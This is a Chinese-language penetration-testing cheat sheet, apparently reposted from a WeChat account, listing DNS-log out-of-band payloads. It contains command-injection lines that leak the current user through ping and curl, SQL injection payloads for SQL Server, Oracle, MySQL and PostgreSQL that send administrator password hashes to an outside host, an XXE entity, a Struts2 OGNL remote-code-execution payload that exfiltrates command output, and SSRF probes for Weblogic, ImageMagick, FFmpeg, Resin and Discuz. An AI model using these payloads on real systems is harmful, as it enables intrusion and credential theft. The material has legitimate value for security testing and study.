0x01 命令执行场景
Liunx/Unix/Mac OS系统:
ping `whoami`.mydnslog.com
curl http://mydnslog.com/`whoami`
Windows系统:
ping %USERNAME%.mydnslog.com
0x02 SQL注入场景
SQL Server数据库:
DECLARE @host varchar(1024);
SELECT @host=(SELECT TOP 1master.dbo.fn_varbintohexstr(password_hash)FROM sys.sql_logins WHERE name='sa')+'.mydnslog.com';
EXEC('master..xp_dirtree"\'+@host+'foobar$"');
Oracle数据库:
SELECT UTL_INADDR.GET_HOST_ADDRESS('mydnslog.com');
SELECT UTL_HTTP.REQUEST('http://mydnslog.com/oracle') FROM DUAL;
SELECT HTTPURITYPE('http://mydnslog.com/oracle').GETCLOB() FROM DUAL;
SELECT DBMS_LDAP.INIT(('mydnslog.com',80) FROM DUAL;
SELECT DBMS_LDAP.INIT((SELECT password FROM SYS.USER$ WHERE name='SYS')||'.mydnslog.com',80) FROM DUAL;
MySQL数据库:
SELECT LOAD_FILE(CONCAT('\\',(SELECT password FROM mysql.user WHERE user='root' LIMIT 1),'.mydnslog.com\abc'));
PostgreSQL数据库:
DROP TABLE IF EXISTS table_output;
CREATE TABLE table_output(content text);
CREATE OR REPLACE FUNCTION temp_function()
RETURNS VOID AS $
DECLARE exec_cmd TEXT;
DECLARE query_result TEXT;
BEGIN
SELECT INTO query_result (SELECT passwd
FROM pg_shadow WHERE usename='postgres');
exec_cmd := E'COPY table_output(content)
FROM E'\\\\'||query_result||E'.psql.mydnslog.com\\foobar.txt'';
EXECUTE exec_cmd;
END;
$ LANGUAGE plpgsql SECURITY DEFINER;
SELECT temp_function();
0x03 XXE场景
XML实体:
<!ENTITY % remote SYSTEM "http://mydnslog.com/xxe_test">
%remote;]>
<root/>
0x04 其他场景
Struts2中间件:
xx.action?redirect:http://mydnslog.com/%25{3*4}
xx.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'whoami'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23t%3d%23d.readLine(),%23u%3d"http://mydnslog.com/result%3d".concat(%23t),%23http%3dnew%20java.net.URL(%23u).openConnection(),%23http.setRequestMethod("GET"),%23http.connect(),%23http.getInputStream()}
FFMpeg插件:
concat:http://mydnslog.com
Weblogic中间件:
example.com/uddiexplorer/SearchPublicRegistries.jsp?operator=http://mydnslog.com/test&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Businesslocation&btnSubmit=Search
ImageMagick插件:
push graphic-context
viewbox 0 0 640 480
fill 'url(http://mydnslog.com)'
pop graphic-context
Resin中间件:
example.com/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=http://mydnslog.com/ssrf
Discuz社群:
example.com/forum.php?mod=ajax&action=downremoteimg&message= &formhash=x
关 注 有 礼
还在等什么?赶紧点击下方名片关注学习吧!
免责声明
由于传播、利用本公众号渗透测试网络安全所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号渗透测试网络安全及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!
原文始发于微信公众号(渗透测试网络安全):渗透测试-DNSLOG使用技巧
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论